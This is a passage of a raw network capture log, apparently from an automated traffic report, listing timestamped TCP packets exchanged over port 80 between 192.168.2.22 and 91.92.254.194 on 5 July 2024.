                  Jul 5, 2024 07:26:25.745954990 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.745968103 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.745995045 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.746084929 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746095896 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746146917 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.746510983 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746562004 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746573925 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746608019 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.746661901 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746673107 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.746726036 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.824300051 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824384928 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824397087 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824440002 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.824445963 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824538946 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824579000 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.824595928 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824605942 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.824641943 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.903970003 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904021978 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904032946 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904061079 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.904128075 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904174089 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.904201031 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904211998 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.904242039 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.904289961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983665943 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983675003 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983683109 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983689070 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983694077 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983700037 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983861923 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983872890 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:25.983892918 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.983942986 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:25.997577906 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063201904 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063343048 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063400984 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063412905 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063498020 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063509941 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.063512087 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063549995 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.063627958 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063638926 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.063679934 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.077102900 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142608881 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142632008 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142642021 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142690897 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.142806053 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142817020 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142827034 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142838955 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142936945 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.142971992 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.142993927 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.143050909 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.221570969 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221744061 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221754074 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221765041 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221781015 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.221796989 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.221800089 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221829891 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221841097 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.221868992 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.222132921 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.222172022 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.222181082 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.222183943 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.222219944 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.222265005 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301388025 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301414967 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301424980 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301462889 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.301479101 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301491976 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301529884 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.301624060 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301634073 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301666021 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.301695108 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301706076 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301716089 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.301734924 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.380959988 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381020069 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.381130934 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381141901 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381159067 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381167889 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381167889 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.381176949 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381186008 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381202936 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.381223917 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.381438971 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381572962 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381582975 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.381616116 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.381994009 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.459810019 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.459856033 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.459866047 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.459877968 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.459907055 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.460014105 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460024118 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460032940 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460050106 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460061073 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.460165977 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.460289955 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460364103 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460375071 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.460413933 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.460436106 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539155006 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539225101 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539241076 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.539256096 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539304018 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.539340019 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539350986 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539407015 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.539439917 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539449930 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539459944 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539494038 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.539582968 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.539639950 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.539993048 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.540052891 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.540062904 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.540095091 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.540152073 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618269920 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618330002 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618336916 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.618367910 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618415117 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.618434906 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618447065 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618455887 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618479967 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.618638992 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.618685007 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.619015932 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619091988 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619102955 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619124889 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.619167089 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619215012 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.619525909 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619604111 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619615078 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619642019 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.619663000 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.619712114 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.632735968 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698004007 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698173046 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698183060 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698194027 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698247910 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698313951 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698323965 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698333979 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698463917 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698474884 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698492050 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.698596954 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.699203968 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.699250937 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.699296951 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.759238005 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.759263992 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.759325981 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.806459904 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806478977 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806492090 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806507111 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806519032 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806525946 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.806529999 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806535006 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.806544065 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806571007 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.806704044 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806756020 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.806757927 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806770086 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.806920052 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.807092905 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.807153940 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.807167053 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.807204962 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.807236910 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.807293892 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.943465948 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.943793058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.944036007 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.951050043 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951241970 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951252937 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951286077 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.951373100 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951383114 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951392889 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951406002 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.951421022 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.951452971 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.952908993 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952919006 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952924013 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952931881 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952941895 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952951908 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:26.952959061 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:26.952980042 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.057558060 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057653904 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.057729006 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057766914 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057777882 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057789087 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057800055 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057811022 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.057817936 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.057817936 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.057856083 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.058048964 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058087111 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058096886 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058140039 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.058397055 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058448076 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058458090 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058487892 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.058680058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058690071 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058700085 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.058726072 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.137150049 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137176037 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137181997 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137219906 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137231112 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137239933 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.137332916 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137342930 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137392044 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.137392044 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.137710094 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137775898 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137785912 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137821913 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.137931108 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137942076 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.137998104 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.138297081 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.138350964 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.138360977 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.138390064 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.138494015 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.138504982 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.138539076 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.138560057 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.139077902 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.139131069 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.216667891 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216677904 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216687918 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216698885 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216731071 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216809988 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216816902 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.216816902 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.216820955 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216833115 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216864109 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.216953039 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.216969967 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217010021 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.217566013 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217576027 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217586994 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217609882 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.217638969 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.217709064 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217719078 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217727900 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217737913 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.217751980 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.217783928 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.218456030 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296049118 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296097994 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296108961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296116114 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296144009 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296237946 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296248913 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296258926 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296271086 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296284914 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296318054 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296509981 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296520948 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296531916 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296565056 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296670914 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296681881 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296691895 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296704054 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.296725988 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.296740055 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.297344923 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.297398090 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.297409058 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.297435045 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.375406981 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375427961 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375438929 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375459909 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.375480890 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.375545025 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375619888 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375644922 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375669956 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.375729084 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375739098 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.375776052 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.376095057 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.376169920 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.376197100 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.376221895 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.376286983 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.376297951 CEST804916391.92.254.194192.168.2.22
                  Jul 5, 2024 07:26:27.376321077 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 07:26:27.376393080 CEST804916391.92.254.194192.168.2.22
